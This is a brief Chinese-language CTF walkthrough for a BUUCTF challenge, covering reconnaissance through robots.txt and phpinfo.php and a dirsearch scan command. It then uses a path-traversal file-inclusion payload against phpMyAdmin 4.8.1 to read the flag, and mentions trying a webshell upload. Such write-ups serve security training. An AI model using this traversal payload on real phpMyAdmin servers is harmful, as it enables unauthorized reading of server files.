提示
- 信息收集
- phpmyadmin的版本漏洞
這里看起來不像是加密應該是編碼錯誤
這里訪問robots.txt
直接把phpinfo.php放出來了
這里能看到它所有的信息
這里并沒有能找到可控點
用dirsearch掃了一遍
####注意掃描buuctf的題需要控制掃描速度,每一秒只能掃10個多一個都要429報錯,并且還得每隔一秒掃一次
dirsearch -u http://69b13721-861d-4bff-ab6b-60a342679bef.node4.buuoj.cn:81 -s 1 -t 10
##我的上一篇博客附上了dirsearch的下載地址以及簡單用法[GXYCTF2019]禁止套娃1-CSDN博客
這里掃出來了phpmyadmin/index.php
這里能看到phpmyadmin的版本信息
其實遇到這種的頁面要做的事
- 去網上搜索看是否存在版本漏洞
- 找上傳點看是否能傳入webshell,例如這里的導入就可以看看
然而這道題是想讓我們通過版本漏洞做題
這里我附上版本漏洞復現的博客phpMyAdmin4.8.1漏洞復現及利用_phpmyadmin4.8.1 漏洞-CSDN博客
構造payload
?target=db_sql.php%253f/../../../../../../../../flag
獲得flag
)
求解23個測試函數(python代碼))
:RT_Thread系統死機日志定位)
)
